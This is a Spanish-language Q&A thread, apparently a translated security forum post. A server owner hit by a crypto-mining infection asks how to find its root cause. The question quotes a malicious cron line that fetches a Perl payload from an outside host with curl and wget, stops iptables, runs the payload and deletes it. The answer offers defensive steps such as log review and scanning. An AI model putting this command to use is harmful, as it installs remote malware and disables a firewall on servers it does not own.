mi servidor fue hackeado y solo pude encontrar el comando cronjob [duplicar]

Question

mi servidor fue hackeado y solo pude encontrar el comando cronjob [duplicar]

#1 de pineappleman (2 votos)

1

Instalé detectores de Clamav y rootkits y no encontraron nada.

El virus ejecuta algunos procesos llamados módulos que comen cpu, el proveedor de mi servidor me dijo que es el virus bitcoin miner, pero no me dieron ninguna otra información. Lo único que descubrí es este cronjob:

*      *       *       *       *       curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish

Maté todo el proceso y eliminé el cronjob. La carpeta / tmp está vacía. El problema es que no encontré el problema principal. ¿Qué más puedo hacer?

virus linux virus-removal

pregunta Amir Bar 09.01.2017 - 12:17

fuente

1 respuesta

Lea otras preguntas en las etiquetas virus linux virus-removal

Disparidad de resultados entre nmap y curl / nc para el método TRACE ¿Puede rastrear el uso de una dirección IP en Internet? ¿Dónde más se usó?

score 2 · Answer 1

Por lo que dijo, es difícil saber si el servidor fue pirateado a través de su aplicación / sitio web, a través de algún software obsoleto o de alguna otra forma, pero algunas cosas que podría intentar:

Verifique sus registros de apache / nginx e intente encontrar solicitudes sospechosas.
Verifique las versiones del software del servidor (servidor web, perl, php ...) y busque versiones obsoletas.
Realice un escaneo de puertos con nmap y busque puertos que estén abiertos pero que no deberían estar.
Haga un escaneo rápido con nikto o algún otro escáner de seguridad de aplicación web. Prueba wpscan si estás usando wordpress.
Mantenga el monitoreo de las conexiones salientes y busque actividades sospechosas.
Cambia tus contraseñas.
Pregunte / pague a alguien para evaluar la seguridad de su aplicación web.

Pero básicamente solo los archivos de registro podrían identificar la causa raíz. Los otros métodos pueden identificar vulnerabilidades, pero no se puede saber si el atacante las utilizó en este caso.